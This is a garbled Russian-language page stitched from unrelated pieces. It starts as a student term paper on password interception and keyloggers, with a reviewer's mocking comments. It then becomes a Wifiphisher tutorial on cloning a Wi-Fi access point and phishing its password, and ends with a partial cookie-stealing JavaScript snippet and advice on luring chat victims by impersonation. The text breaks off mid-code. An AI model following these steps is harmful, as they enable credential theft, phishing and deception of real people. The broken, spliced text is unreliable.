• Собираем пароли юзеров с помощью прокси и сниффера. Сниффинг данных в других программах

    Введение

    Согласитесь, что в настоящее время трудно себе представить компьютерную жизнь без постоянного ввода пароля. Пароль нам необходим везде - начиная от включения компьютера, регистраций на различных сайтах и форумах, доступу к своим почтовым ящикам и заканчивая созданием аккаунтов (страниц с личными данными и настройками) в платежных системах и отправкой/получением платежей в электронном виде. И если при одноразовой регистрации на каком-либо случайном сайте (например, только лишь для скачивания игры) можно не задумываясь указать любой пароль (даже «123456»), то при создании постоянного аккаунта на важном сайте (тем более, если это связано с денежными операциями) пароль должен быть очень надёжным.В противном случае пароль может быть взломан злоумышленником, а полученные личные данные могут быть использованы для общения в сети от нашего имени (в лучшем случае) либо для получения кредитов или открытия счетов. Поэтому лучше позаботиться о защите заранее, и уже сегодня изменить все свои «слабые» пароли на более надёжные.
    Целью курсового проекта является рассмотрение Методов перехвата паролей пользователей компьютерных систем и методы противодействия им

    Чет мало как то))))))))))))))))))))))))))))))
    Целью курсового проекта является???????????????
    МЕТОДЫ ПЕРЕХВАТА ПАРОЛЕЙ И ПРОТИВОДЕЙСТВИЯ ИМ

    Брутфорс
    Брутфорс(от английского bruteforce - полный перебор или метод «грубой силы») – один из популярных методов взлома паролей на серверах и в различных программах. Заключается он в том, что программа-взломщик пытается получить доступ к какой-либо программе (например, к почтовому ящику) путем перебора паролей по критериям, заданным владельцем данной программы: по словарю, по длине, по сочетаниям цифр, да в принципе таких критериев существует множество.
    Способ взлома брутфорсом является достаточно долгим, но мощным, поэтому остается на вооружении у хакеров и по сей день, а с учетом все увеличивающихся мощностей компьютеров и пропускной способности интернет-каналов останется на вооружении еще на долгое время.
    Данный способ подбора паролей очень хорош тем, что пароль в конце концов взламывается, но это может занять весьма и весьма долгое время, зачастую даже столетия. Так что данный способ взлома оправдывает себя не всегда, если пользователь-владелец взламываемого сервиса вел себя достаточно хитро и не использовал простых паролей типа «123», «qwerty» и тому подобных, а использовал и заглавные, и строчные символы, плюс ко всему этому задействовал и цифры, и разрешенные специальные символы. Если пароль при всем этом обладает еще и достаточной длинной (около 10 символов), то ему взлом методом брутфорса практически не грозит.
    При брутфорсе чаще всего используется словарная атака – подбор паролей идет из текстового файла заранее составленного (выпрошенного, купленного, украденного, скачанного бесплатно) словаря. Данный способ атаки очень эффективен при массовом взломе, допустим, аккаунтов интернет-мессенджера ICQ, когда злоумышленник, допустим, пытается взломать некий диапазон ICQ-номеров. При этом существует довольно большая вероятность, что при атаке по словарю ему это удастся. Примерами могут служить неоднократные факты взлома.
    С 2005 года значительно увеличилось также количество атак, осуществляемых на защищенные SSH-сервисы. Даже если у вас на сервере установлено самое новейшее программное обеспечение, это вовсе не значит, что подобрать пароль к нему невозможно, если межсетевой экран бездействует или настроен неправильно или недостаточно. Так что для увеличения невозможности взлома настройте свой фаервол должным образом, это поможет оградить вас от неприятных сюрпризов в дальнейшем.
    Программ для проведения брута на просторах Интернета выложено очень много, также существует большое количество бесплатных и платных словарей к ним.
    Ну и напоследок поговорим немного о математической стороне брута.
    Как говорит Википедия, любая задача из класса NP может быть решена путем полного перебора. Но все это может потребовать экспоненциального времени.
    При разработке различных криптографических шифров метод тотального перебора используют при оценке его (шифра) стойкости к взлому. При этом новый шифр считается достаточно стойким, если не существует более быстрого метода его взлома, чем полный перебор всех возможных ключей. Такие криптографические атаки, как и брут, являются самыми действенными, но и занимают зачастую очень много времени.
    При знании некоторых условий метод брута паролей использует отсев неприемлемых значений (пустых паролей, одних и тех же повторяющихся символов и т.д.). В математике этот метод называется метод ветвей и границ.
    Также при бруте используются методы распараллеливания вычислений, когда одновременно перебираются несколько паролей. Осуществляется это двумя методами: методом конвейера и методом брута из непересекающихся подмножеств всех возможных паролей.

    Рисунок 1. Модель аппаратного ввода системы Windows
    При возникновении неких событии ввода (нажатии клавиш, перемещении мыши) события обрабатываются соответствующим драйвером и помещается в системную очередь аппаратного ввода. В системе имеется особый поток необработанного ввода, называемый RIT (RawInputThread), который извлекает события из системной очереди и преобразует их в сообщения. Полученные сообщения помещаются в конец очереди виртуального ввода одного из потоков (виртуальная очередь потока называется VIQ – VirtualizedInputQueue-). При этом RIT сам выясняет, в очередь какого конкретно потока необходимо поместить событие. Для событий мыши поток определяется поиском окна, над которым расположен курсор мыши. Клавиатурные события отправляются только одному потоку – так называемому активному потоку (т.е. потоку, которому принадлежит окно, с которым работает пользователь). На самом деле это не совсем так - в частности, на рисунке 1 показан поток A, не имеющий очереди виртуального ввода. В данном случае получатся, что потоки A и B совместно используют одну очередь виртуального ввода. Это достигается при помощи вызова API функции AttachThreadInput, которая позволяет одному потоку подключиться к очереди виртуального ввода другого потока.
    Следует отметить, что поток необработанного ввода отвечает за обработку специальных сочетаний клавиш, в частности Alt+Tab и Ctrl+Alt+Del.
    Слежение за клавиатурным вводом при помощи ловушек
    Данная методика является классической для клавиатурных шпионов. Суть метода состоит в применении механизма ловушек (hook) операционной системы. Ловушки позволяют наблюдать за сообщениями, которые обрабатываются окнами других программ. Установка и удаление ловушек производится при помощи хорошо документированных функций API библиотеки user32.dll (функция SetWindowsHookEx позволяет установить ловушку, UnhookWindowsHookEx - снять ее). При установке ловушки указывается тип сообщений, для которых должен вызываться обработчик ловушки. В частности, есть два специальных типа ловушки WH_KEYBOARD и WH_MOUSE - для регистрации событий клавиатуры и мыши соответственно. Ловушка может быть установлена для заданного потока и для всех потоков системы. Ловушка для всех потоков системы очень удобна для построения клавиатурного шпиона.
    Код обработчика событий ловушки должен быть расположен в DLL. Это требование связано с тем, что DLL с обработчиком ловушки проецируется системой в адресное пространство всех GUI процессов. Интересной особенностью является то, что проецирование DLL происходит не в момент установки ловушки, а при получении GUI процессом первого сообщения, удовлетворяющего параметрам ловушки.
    Методика ловушек достаточно проста и эффективна, но у нее есть ряд недостатков. Первым недостатком можно считать то, что DLL с ловушкой проецируется в адресное пространство всех GUI процессов, что может применяться для обнаружения клавиатурного шпиона. Кроме того, регистрация событий клавиатуры возможна только для GUI приложений, это легко проверить при помощи демонстрационной программы.
    Слежение за клавиатурным вводом при помощи опроса клавиатуры
    Данная методика основана на периодическом опросе состояния клавиатуры. Для опроса состояния клавиш в системе предусмотрена специальная функция GetKeyboardState, возвращающая массив из 255 байт, в котором каждый байт содержит состояние определенной клавиши на клавиатуре. Данный метод уже не требует внедрения DLL в GUI процессы и в результате шпион менее заметен.
    Однако изменение статуса клавиш происходит в момент считывания потоком клавиатурных сообщений из его очереди, и в результате подобная методика работает только для слежения за GUI приложениями. От этого недостатка свободна функция GetAsyncKeyState, возвращающая состояние клавиши на момент вызова функции.
    Недостатком клавиатурных шпионов такого типа является необходимость периодического опроса состояния клавиатуры с достаточно высокой скоростью, не менее 10-20 опросов в секунду.
    Слежение за клавиатурным вводом при помощи перехвата API функций
    Данная методика не получила широкого распространения, но тем не менее она может с успехом применяться для построения клавиатурных шпионов.. Разница между RootKit и клавиатурными шпионами в данном случае невелика – шпион будет перехватывать функции с целью мониторинга, а не с целью модификации принципов работы и результатов вызова.
    Простейшим способом может быть перехват функций GetMessage, PeekMessage и TranslateMessage библиотеки User32, что позволит вести мониторинг всех сообщений, получаемых GUI приложениями.

    Клавиатурный шпион на базе драйвера
    Данный метод еще более эффективен, чем описанные выше методы. Возможны как минимум два варианта реализации этого метода – написание и установка в систему своего драйвера клавиатуры вместо штатного или установка драйвера - фильтра. Применение драйвера - фильтра является наиболее корректной методикой.

    Аппаратные клавиатурные шпионы
    В ходе решения задач по защите от утечки информации часто рассматривают только различные программные средства для шпионажа за работой пользователя. Однако кроме программных возможны и аппаратные средства:
    Установка устройства слежения в разрыв кабеля клавиатуры (например, устройство может быть выполнено в виде переходника PS/2);
    Встраивание устройства слежения в клавиатуру;
    Считывание данных путем регистрации ПЭМИН (побочных электромагнитных излучений и наводок);
    Визуальное наблюдение за клавиатурой
    Аппаратные клавиатурные шпионы встречаются намного реже, чем программные. Однако при проверке особо ответственных компьютеров (например, применяемых для совершения банковских операций) о возможности аппаратного слежения за клавиатурным вводом не следует забывать.
    Пример клавиатурного шпиона
    В настоящее время сотни клавиатурных шпионов, рассмотрим в качестве примера достаточно распространенную коммерческую программу ActualSpy(Диалоговое окно программы изображено ниже) (http://www.actualspy.ru). Данная программа может регистрировать клавиатурный ввод (с регистрацией заголовка окна и имени программы), снимать скриншоты экрана по расписанию, регистрировать запуск/остановку программ, следить за буфером обмена, принтером, создаваемыми пользователем файлами. Кроме того, в программе реализовано слежение за Интернет-соединениями и посещаемыми сайтами. ActualSpy выбран в качестве примера

    Программа имеет простейшую маскировку от обнаружения – она не видна в стандартном списке задач Windows. Для анализа собранной информации программа формирует протоколы в формате HTML. Принцип работы программы ActualSpy основан на ловушке, регистрирующей события клавиатуры.
    В качестве других примеров могут выступить SpyAgent (http://www.spytech-web.com), ActMon (http://www.actmon.com), SpyBuddy (http://www.actmon.com), PC ActivityMonitor (http://www.keyloggers.com), KGB Spy (http://www.refog.ru/)…. Этот список можно продолжать очень долго, однако в большинстве случаев современные клавиатурные шпионы имеют примерно одинаковую базовую функциональность и различаются сервисными функциями и качеством маскировки в системе.
    Методики поиска клавиатурных шпионов
    1. Поиск по сигнатурам. Данный метод не отличается от типовых методик поиска вирусов. Сигнатурный поиск позволяет однозначно идентифицировать клавиатурные шпионы, при правильном выборе сигнатур вероятность ошибки практически равна нулю. Однако сигнатурный сканер сможет обнаруживать заранее известные и описанные в его базе данных объекты;
    2. Эвристически алгоритмы. Как очевидно из названия, это методики поиска клавиатурного шпиона по его характерным особенностям. Эвристический поиск носит вероятностный характер. Как показала практика, этот метод наиболее эффективен для поиска клавиатурных шпионов самого распространенного типа – основанных на ловушках. Однако подобные методики дают много ложных срабатываний. Исследования показали, что существуют сотни безопасных программ, не являющихся клавиатурными шпионами, но устанавливающих ловушки для слежения за клавиатурным вводом и мышью. Наиболее распространенный примеры - программы PuntoSwitcher, словарь Lingvo, программное обеспечение от мультимедийных клавиатур и мышей;
    3. Мониторинг API функций, используемых клавиатурными шпионами. Данная методика основана на перехвате ряда функций, применяемых клавиатурным шпионом – в частности, функций SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState. Вызов данных функций каким либо приложением позволяет вовремя поднять тревогу, однако проблемы многочисленных ложных срабатываний будут аналогичны методу 2;
    4. Отслеживание используемых системой драйверов, процессов и сервисов. Это универсальная методика, применимая не только против клавиатурных шпионов. В простейшем случае можно применять программы типа KasperskyInspector или Adinf, которые отслеживают появление в системе новых файлов.

    Программы для поиска и удаления клавиатурных шпионов
    1. Любой антивирусный продукт. Все антивирусы в той или иной мере могут находить клавиатурные шпионы, однако клавиатурный шпион не является вирусом и в результате пользы от антивируса мало;
    2. Утилиты, реализующие механизм сигнатурного поиска и эвристические механизмы поиска. Примером может служить утилита AVZ, сочетающая сигнатурный сканер и систему обнаружения клавиатурных шпионов на базе ловушек;
    3. Специализированные утилиты и программы, предназначенные для обнаружения клавиатурных шпионов и блокирования их работы. Подобные программы наиболее эффективны для обнаружения и блокирования клавиатурных шпионов, поскольку как правило могут блокировать практически все разновидности клавиатурных шпионов.

    Из специализированных программ интерес могут представлять коммерческие продукты PrivacyKeyboard и Anti-keylogger(пример программы (http://www.bezpeka.biz/). Интерфейс программы Anti-keylogger показан на рисунке:

    Программа Anti-keylogger работает в фоновом режиме и производит обнаружение программ, подозреваемых в слежении за клавиатурой. В случае необходимости можно вручную разблокировать работу любой из обнаруженных программ (например, на рисунке видно, что в список «шпионов» попали MSCTF и программа закачки из Интернета FlashGet). Для обнаружения клавиатурных шпионов не применяются базы сигнатур, обнаружение ведется эвристическими методами.
    Тестирование программы показало, что она эффективно противодействует клавиатурным шпионам, основанным на применении ловушек, циклического опроса и клавиатурного драйвера-фильтра.
    Другим примером может служить программа AdvancedAntiKeylogger (Пример работы программы изображен ниже) (http://www.anti-keylogger.net).

    В режиме обучения данная программа по логике работы напоминает Firewall – при обнаружении подозрительной активности ится предупреждение с указанием имени и описания программы. Пользователь может выбрать действие на сеанс (разрешить, запретить), или создать постоянное правило для приложения. В ходе тестов AdvancedAntiKeylogger уверенно обнаружил все основные разновидности клавиатурных шпионов (на базе ловушки, циклического опроса, драйвера-фильтра). Настройки программы защищаются паролем, который задается в ходе инсталляции.

    Заключение
    Клавиатурный шпион не является вирусом, но, тем не менее, представляет большую угрозу для пользователей, поскольку позволяет злоумышленнику следить за работой пользователя и может применяться для похищения конфиденциальной информации, в том числе паролей пользователя. Опасность клавиатурного шпиона может существенно возрасти при его сочетании с RootKit-технологией, которая позволит замаскировать присутствие клавиатурного шпиона. Еще более опасной является троянская или backdoor программа, содержащая клавиатурный шпион – его наличие существенно расширяет функции троянской программы и ее опасность для пользователя.

    Значит так приведи всё в порядок я не могу понять где пункты где что, все рисунки подписать. убрать(или заменить) все фразы рассуждения это не журнал

    Ну а так нормально
    Заключение

    После изучения материала можно сделать некоторые умозаключения:
    Это шо такое боюсь спросить))))))))))))))))))?????????????????????? Убрать слово ты что книгу пишешь
    1. Пароль не должен быть коротким.
    Иметь пароль менее 8 символов вообще нежелательно, а ещё лучше, чтобы пароль содержал 10-12 символов или больше.
    2. Пароль не должен содержать только цифры или только буквы (особенно повторяющиеся). Лучше всего, когда буквы и цифры чередуются, а ещё лучше, если в пароль добавляются специальные символы или знаки препинания.
    4. Не использоваться использовать пароль, который содержит любые данные о вас или вашей семье -всевозможные памятные даты (рождения, свадьбы и пр.), имена и фамилии родственников, номера квартир, документов или телефонов. Недопустимо также использование любых комбинаций, составленных из личных данных.
    5. Пароль должен быть бессмысленным, поэтому лучше отказаться от пароля, который представляет собой любое существующее словарное слово (на любом языке).
    6. Не использовать «секретные вопросы», ответы на которые можно легко узнать или подобрать.
    7. Необходимо использовать уникальный пароль для каждого отдельного Интернет сервиса, форума, сайта.
    8. Не держать пароли у всех на виду.
    9. Не xранить пароли в Интернете или на компьютере в виде текстового файла.
    Если злоумышленник получит доступ к нашему компьютеру, то найти файл с паролями для него будет ещё проще (при чем в любом месте на жестком диске).
    10. Не хранить пароли с помощью встроенных в браузер «хранителей паролей».
    Во-первых, никогда нельзя быть уверенным в надежности такого «хранителя» и в том, что сам браузер не содержит «дыр» в защите. Злоумышленники в первую очередь ищут «дыры» в браузерах, т.к. браузерами пользуются все.
    Во-вторых, если случится сбой в работе браузера или всей системы, то очень велика вероятность, что мы потеряем доступ ко всем паролям, которые хранит браузер, а это хоть и не взлом, но тоже неприятно.
    11. Делать копии паролей.
    Если для хранения паролей вы используете специальные программные средства, то не забывайте периодически делать резервные копии баз данных с паролями. Если же вы храните пароли на листке бумаги, то сделайте вторую копию такого листа (или блокнота) и храните оригинал и дубликат в разных (укромных) местах.
    12. Не вводить пароли в посторонних программах, на посторонних сайтах, а также не отсылайте пароли по почте (даже по запросу от службы поддержки или администрации сайта). Администрация НАСТОЯЩЕГО серьезного сайта никогда не потребует пароль, поэтому если вы получили подобный запрос, то это скорее всего работа мошенников.
    13. Как можно реже вводить пароли с использованием чужих компьютеров, а особенно в общественных местах (интернет-кафе, терминалах и т.п.). Крайне не желательно на чужом компьютере вводить пароли для входа в аккаунт платежных систем или использовать интернет-банкинг, т.к. не исключено, что на этом компьютере используется устройство или программа для запоминания последовательности нажатий клавиш (клавиатурные шпионы).
    14. Периодически менять пароли (особенно если пользовались паролем за чужим компьютером). Чем надежнее пароль, тем дольше можно его использовать. Надёжный пароль из 12-14 символов, составленный с учетом описанных выше рекомендаций можно не менять несколько лет.

    Список литературы(он тут когда-нибудь будет)

    Но некоторые читатели жалуются, что на взлом WPA2 уходит слишком много времени, а защита WPS включена далеко не на всех точках доступа (на мой взгляд, точек с WPS всё ещё достаточно много). Чтобы помочь вам в таких ситуациях, я расскажу о практически гарантированном способе получения пароля от Wi-Fi без всякого взлома с помощью

    Скрыто от гостей

    .

    Этапы стратегии Wifiphisher

    Идея заключается в создании , а затем деаутентификации пользователя с его оригинальной точки (для этого подойдёт и DoS-атака). После повторного подключения, он попадёт на вашу поддельную точку доступа с тем же SSID и увидит кажущуюся настоящей веб-страницу запрашивающую пароль из-за «обновления прошивки». Как только пароль будет введён, вы перехватите его и позволите ему использовать злого близнеца, как настоящую точку доступа, чтобы он ничего не заподозрил. Отличный план!

    Таким образом, Wifiphisher выполняет следующие действия:

  • Выкидывает пользователя с настоящей точки доступа.
  • Позволяет ему войти на вашу поддельную точку доступа.
  • Демонстрирует пользователю веб-страницу, уведомляющую об успешном «обновлении прошивки» и необходимости повторного ввода учётных данных.
  • Передаёт хакеру пароль от Wi-Fi, в то время как ничего не подозревающий пользователь продолжает спокойно пользоваться интернетом.
  • Подобные скрипты не являются чем-то новым, взять хотя бы Airsnarf. Но Wifiphisher выгодно отличается от них своей продвинутостью. Этот автоматический скрипт значительно упрощает вашу работу, однако, при желании, вы всегда можете выполнить вышеописанные шаги и вручную

    Для достижения поставленной цели вам понадобиться и два , один из которых способен выполнять инъекцию пакетов. В данном случае, я воспользовался моделью . Вы можете выбрать и другие адаптеры, но прежде чем сделать это, убедитесь, что они совместимы с (поддерживают инъекцию пакетов). Пожалуйста, не жалуйтесь, что у вас ничего не работает, пока не проверите свой беспроводной адаптер и не убедитесь, что он способен совершать инъекцию пакетов. У большинства моделей такая возможность отсутствует.

    Ну а теперь, давайте взглянем на Wifiphisher.

    Шаг 1: Скачайте Wifiphisher

    Для начала, запустите Kali и откройте терминал. Затем скачайте Wifiphisher с

    Скрыто от гостей

    И распакуйте код.

    Kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

    На скриншоте ниже видно, что я распаковал исходный код Wifiphisher.

    Кроме этого, вы можете скопировать код с GitHub, выполнив следующую команду:

    Kali > git clone https://github/sophron/wifiphisher

    Шаг 2: Откройте директорию утилиты

    Kali > cd wifiphisher-.1.1

    Просматривая содержимое этой директории, вы увидите там скрипт wifiphisher.py.

    Kali > ls -l

    Шаг 3: Запустите скрипт

    Вы можете запустить скрипт Wifiphisher, воспользовавшись этой командой:

    Kali > python wifiphisher.py

    Обратите внимание, что перед названием скрипта я поставил имя интерпретатора – python.

    Во время первого запуска, скрипт, скорее всего, сообщит вам, что «hostapd» не найден и предложит его установить. Чтобы начать установку hostapd, введите «y» (да).

    После завершения установки, снова выполните скрипт Wifiphisher.

    Kali > python wifiphisher.py

    На этот раз он запустит веб-сервер на порте 8080 и 443, а затем найдёт все доступные сети Wi-Fi.

    После этого вы увидите список всех обнаруженных Wi-Fi сетей на экране. В моём примере утилите удалось найти сеть под названием «wonderhowto». Она и станет целью нашей атаки.

    Шаг 4: Начните атаку и получите пароль

    Нажмите Ctrl + C на своей клавиатуре, и приложение попросит вас ввести номер точки доступа, которую вы хотите атаковать. В моём случае это точка номер 12.

    После нажатия клавиши Enter, Wifiphisher покажет вам страничку, которую вы можете видеть на скриншоте ниже. Это значит, что интерфейс сейчас используется и происходит клонирование SSID и атака выбранной точки доступа.

    Пользователь будет отключён от своей точки доступа. Во время повторного подключения он будет направлен на нашу .

    Как только это произойдёт, прокси на веб-сервере перехватит запрос и подсунет пользователю поддельную страничку входа, информирующую об установке новой версии прошивки маршрутизатора и необходимости повторной аутентификации.

    Как видите, я ввёл свой пароль (nullbyte) и нажал Отправить.

    Когда пользователь введёт своё пароль, он будет передан вам через открытый терминал Wifiphisher. Затем утилита пропустит пользователя в интернет через вашу систему, дабы он ничего не заподозрил.

    Теперь вы сможете получить даже самый сложный пароль от Wi-Fi ! Не забывайте иногда возвращаться к нам за новыми интересными статьями, посвящёнными различным методикам взлома!

    Хакерские Cкрипты PHP. JS. PERL.
    Скрипты для кражи паролей
    br>Итак, в этой статье я расскажу, как можно получить пароль и всякую интересную информацию при помощи сайта. Всё что нужно "хацкеру" - это просто иметь в сети свою страничку, на которую вы либо придёте сами, либо вас туда заманят. Скитаясь по сети, я всё чаще и чаще слышу плохие отзывы о социнжинерии. Если вас не интересуют способы взлома с применением социнжинерии или для вас это всё детский лепет, то нажмите в верхнем углу вашего браузера крестик и забудьте о существовании этой статьи. В наше время мало только разбираться в системных кодах и всяких программерских штучках, но ещё надо уметь общаться с народом. Многие хакеры взламывают банки, компьютеры, базы данных не только вычисляя уязвимости в системе безопасности, но и пользуются социнженерией на каждом углу, ведь хакер не только тот, кто взломал систему, но и тот, кто методом общения получает зачастую доступ к самым любопытным местам инета. Достаточно вспомнить так называемого мега хакера Митника, который взломал систему безопасности банка при помощи как раз той самой соцэнжинерии. Сначала я объясню способ взлома простых пользователей, а затем более глобальный взлом, например какой-нить фирмы. Представьте себе, что "хацкер" платит за сеть немалую сумму и начинает подумывать, как бы сделать её бесплатной, или его не пускают без пароля на какой-то рессурс в сети, а у вас есть то, что ему нужно. Первоначально он создаёт себе страничку в сети и на одной из страничек вживляет код примерно вот такой!

    var cook=show_all_cookies();

    document.open("cookies",cook);

    document.write("

    document.close("cookies");

    (скрипт в целях безопасности был немного изменён) Теперь остаётся только заманить на сайт жертву, где вылетит окошко с надписью "Доброго времени суток" после нажатия на кнопку ОК на мыло злоумышленника будут высланы ваши Cookies, в которых содержится много чего интересного - от вашего IP адреса до паролей к службам, которыми вы пользуетесь.

    При простом изучении Cookies можно отрыть довольно много интересной информации. Всё, чем злоумышленник рискует - это то, что он светит своё мыло, но так как сейчас слишком много халявных почтовых ящиков, это не так опасно. Обычно ящик создаётся для проведения атаки, а затем либо сносится или забрасывается и взломщика уже не найти. Хотя можно этот скрипт написать в файле с расширением js и вставить на сайте его при помощи

    Выкладываем свои!

    в этом случает мыло уже не светится. Как же заманить жертву на свой сайт? Да способов до безумия много, например, вы вваливаетесь на чат и выбираете жертву, немного поговорив с жертвой, вы должны добиться её расположения, лучше всего если ваша жертва будет противоположного вам пола. Практика показывает, что лучше всего чтобы вы были представлены в чате девушкой, соответственно выбираете себе ник, который бы вас характиризовал, как девушку (при разговоре смотрите, что пишите. Не выдайте себя окончаниями слов, если вы притворились девушкой, так будьте ей). Каждому понятно, что с девушкой будут говорить все. Помните, что лучше на жертву не давить, а, например, спросить "а у тебя есть фотка? Моя лежит вот по этому адресу http://ваш сайт.ru, сходи если хочешь". Каждому парню будет интересно знать, как выглядит его собеседница, а как только он попадёт на вашу страничку, вы лезьте в потовый ящик и забирайте оттуда его Cookies. Вот и всё, теперь просто надо в них порыться и вы найдёте практически всё, что хотите, таким же способом можно узнавать IP адрес человека, который пользуется прокси серверами, а зная IP, уже можно будет проверить его на расшаренные ресурсы, провести Dos атаку или просто по детски выкинуть из чата. А также можно просто прикалываться при помощи сайта, например, при помощи вот этого скрипта:

    for(I=1 ; I